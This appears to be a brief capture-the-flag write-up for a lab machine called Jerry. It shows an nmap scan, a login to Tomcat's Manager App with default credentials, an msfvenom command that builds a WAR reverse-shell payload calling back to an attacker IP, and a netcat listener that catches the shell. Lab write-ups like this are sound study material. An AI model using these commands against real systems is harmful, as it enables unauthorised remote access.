Let's do a port scan to find if there are any services running.
nmap -sC -sV -oA nmap/initial -vvv 10.10.10.95
We found Apache Tomcat with http is running on port 8080, so let's check what is being served at 10.10.10.95:8080.
Manager App looks interesting. Upon clicking on it, we are greeted with a login prompt.
Upon clicking cancel, we are greeted with an example of default credentials for Tomcat.
If we put those credentials into the login prompt from earlier, we reach the console page.
We see a place upload a file, so let's use msfvenom to generate a payload to get reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.251 LPORT=44 -f war > shelle0.war
Next we upload the payload and go to 10.10.10.95:8080/shelle0/
Then we use netcat to listen on port 44 get shell.
nc -l -v -p 44
With some poking around, we find some logins for Tomcat
Now if we navigate to the desktop of the Administrator account, we find the flags.
- Never use default credentials
Here is a list of resources I used at some point while working on Jerry: